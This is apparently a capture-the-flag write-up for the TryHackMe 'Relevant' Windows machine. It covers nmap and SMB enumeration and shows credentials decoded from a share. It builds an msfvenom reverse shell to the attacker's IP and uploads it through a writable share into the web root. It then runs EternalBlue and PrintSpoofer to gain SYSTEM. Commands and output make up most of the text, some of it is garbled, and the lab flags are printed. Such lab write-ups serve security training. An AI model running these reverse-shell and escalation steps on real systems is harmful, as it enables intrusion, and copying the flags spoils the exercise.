Recon
Nmap
nmap -sC -sV -A -T3 -oN nmap.txt 10.10.94.10180/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open ��"%�
�Z�E���A Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2023-07-30T04:40:06
|_Not valid after: 2024-01-29T04:40:06
|_ssl-date: 2023-07-31T04:42:51+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2023-07-31T04:42:12+00:00
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsCan also use: Threader3000
SMB
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.94.101PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.94.101\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.94.101\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.94.101\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: <none>
| Current user access: READ/WRITE
| \\10.10.94.101\nt4wrksv:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ/WRITEOr:
smbclient -L //10.10.94.101/Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disksmbclient //10.10.94.101/nt4wrksvsmb: \> get passwords.txtContent:
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQkDecode base 64:
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$Gobuster
gobuster dir -u http://10.10.129.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100/*checkout* (Status: 400) [Size: 3420]
/*docroot* (Status: 400) [Size: 3420]
/* (Status: 400) [Size: 3420]
/http%3A%2F%2Fwww (Status: 400) [Size: 3420]
/q%26a (Status: 400) [Size: 3420]
/http%3A (Status: 400) [Size: 3420]
/**http%3a (Status: 400) [Size: 3420]
/*http%3A (Status: 400) [Size: 3420]
/**http%3A (Status: 400) [Size: 3420]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 3420]
/http%3A%2F%2Fblogs (Status: 400) [Size: 3420]
/http%3A%2F%2Fblog (Status: 400) [Size: 3420]
/**http%3A%2F%2Fwww (Status: 400) [Size: 3420]Nuclei
nuclei -u http://10.10.94.101 -o nuclei.txt[options-method] [http] [info] http://10.10.94.101 [OPTIONS, TRACE, GET, HEAD, POST]RPC
impacket-rpcdump 10.10.94.101 -p 135 > rpc.txtProtocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: schedsvc.dll
UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0
Bindings:
ncalrpc:[LRPC-1e04bfe770857707ee]
ncalrpc:[ubpmtaskhostchannel]
ncacn_ip_tcp:10.10.94.101[49668]
ncacn_np:\\RELEVANT[\PIPE\atsvc]
ncacn_np:\\RELEVANT[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncalrpc:[LRPC-a239fea5b9530119f4]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[DeviceSetupManager]
ncalrpc:[OLEDAD8CAB2C79844698D9926A9FDE3]nmap -sC -sV -A -p10000-50000 -T4 -oN nmap.txt 10.10.94.101PORT STATE SERVICE VERSION
49663/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsTry to go to:
http://10.10.129.35:49663/nt4wrksvThere are no errors! Try:
http://10.10.129.35:49663/nt4wrksv/passwords.txtCan read the file properly.
Important
Web server and SMB share use the same directory!
Access
Generate a payload by using Metasploit Venom and run Metasploit Multi-Handler: https://pentest.ws/tools/venom-builder
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.13.30.179 LPORT=8888 -f aspx -o shell.aspxmsfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/shell_reverse_tcp; set LHOST 10.13.30.179; set LPORT 8888; run"Upload payload:
smb: \> put shell.aspxExecute the payload:
http://10.10.129.35:49663/nt4wrksv/shell.aspxFlag location: c:\Users\Bob\Desktop, flag:
Success
THM{fdk4ka34vk346ksxfr21tg789ktf45}
The folder of the share nt4wrksv is at C:/inetpub/wwwroot/nt4wrksv of the target machine.
Privilege Escalation
nmap -Pn -script vuln -p 80,135,139,445,3389 10.10.223.114 -T4 -oN nmap.txtHost script results:
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143Find exploit:
searchsploit ms17-010Result:
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.pyCopy and rename the exploit:
searchsploit -m 42315.py && mv 42315.py exploit.pyReplace username and password in exploit.py.
Modify the smb_pwn function:
smb_send_file(smbConn, 'rshell.exe', 'C', '/rshell.exe')
service_exec(conn, r'c:\rshell.exe')Then run:
python exploit.py IPGet this error:
Traceback (most recent call last):
File "exploit.py", line 3, in <module>
from mysmb import MYSMB
ImportError: No module named mysmbDownload mysmb.py from this link. If there are any errors related to wrong arguments, read this issue.
Generate reverse shell for exploit:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=8888 -f exe > rshell.exeRun a meterpreter or Netcat listener that can receive the reverse shell.
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/shell_reverse_tcp; set LHOST tun9; set LPORT 8888; run"Rerun the exploit again, the output can be:
Target OS: Windows Server 2016 Standard Evaluation 14393
Using named pipe: samr
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffff9a8a0f802020
SESSION: 0xffffd28b845d8050
FLINK: 0xffffd28b85302098
InParam: 0xffffd28b852fc16c
MID: 0x2903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
DoneBut, nothing happens 😔. Try a couple times and think this could be a rabbit hole.
Follow the walkthrough video from the creator of the room, use this command to check privileges:
whoami /privOutput:
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledNotice the SeImpersonatePrivilege privilege.
We will use the PrintSpoofer exploit. Donwload and put it to the nt4wrksv share by using smbclient.
Run the exploit like this:
PrintSpoofer64.exe -i -c cmdAnd boom 🤯. Check the privilege:
whoamiOutput:
nt authority\systemNavigate to C:/Users/Administrator/Desktop/root.txt and we will have the flag:
Success
THM{1fk5kf469devly1gl320zafgl345pv}